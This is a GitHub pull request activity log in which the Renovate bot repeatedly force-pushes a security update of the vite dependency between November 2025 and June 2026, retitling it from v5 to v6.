@renovate renovate Bot force-pushed the renovate/npm-vite-vulnerability branch from f8efa7a to 548e678 Compare November 10, 2025 22:09
@renovate renovate Bot force-pushed the renovate/npm-vite-vulnerability branch from 548e678 to 4bbab07 Compare December 3, 2025 16:47
@renovate renovate Bot force-pushed the renovate/npm-vite-vulnerability branch from 4bbab07 to 16c00cf Compare December 31, 2025 18:48
@renovate renovate Bot force-pushed the renovate/npm-vite-vulnerability branch from 16c00cf to 1b50d49 Compare January 8, 2026 20:55
@renovate renovate Bot force-pushed the renovate/npm-vite-vulnerability branch 2 times, most recently from 2e1f231 to a9bb577 Compare January 23, 2026 20:56
@renovate renovate Bot force-pushed the renovate/npm-vite-vulnerability branch from a9bb577 to 55f75d9 Compare February 2, 2026 15:43
@renovate renovate Bot force-pushed the renovate/npm-vite-vulnerability branch from 55f75d9 to 364d0bb Compare March 5, 2026 16:46
@renovate renovate Bot force-pushed the renovate/npm-vite-vulnerability branch from 364d0bb to 62baf18 Compare April 15, 2026 18:09
@renovate renovate Bot changed the title chore(deps): update dependency vite to v5 [security] chore(deps): update dependency vite to v6 [security] Apr 15, 2026
@renovate renovate Bot force-pushed the renovate/npm-vite-vulnerability branch from 62baf18 to 07fd748 Compare May 1, 2026 11:11
@renovate renovate Bot force-pushed the renovate/npm-vite-vulnerability branch 2 times, most recently from be7fa3c to 894d2fe Compare May 18, 2026 13:37
@renovate renovate Bot force-pushed the renovate/npm-vite-vulnerability branch 2 times, most recently from 4dba5c9 to 6c9f89c Compare June 1, 2026 23:54
@renovate renovate Bot force-pushed the renovate/npm-vite-vulnerability branch from 6c9f89c to 46bbfcf Compare June 11, 2026 10:09
@renovate renovate Bot force-pushed the renovate/npm-vite-vulnerability branch from 46bbfcf to 153124e Compare June 24, 2026 11:34
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Reviewers

No reviews

Assignees

No one assigned

Labels

dependencies

Projects

None yet

Milestone

No milestone

Development

Successfully merging this pull request may close these issues.

0 participants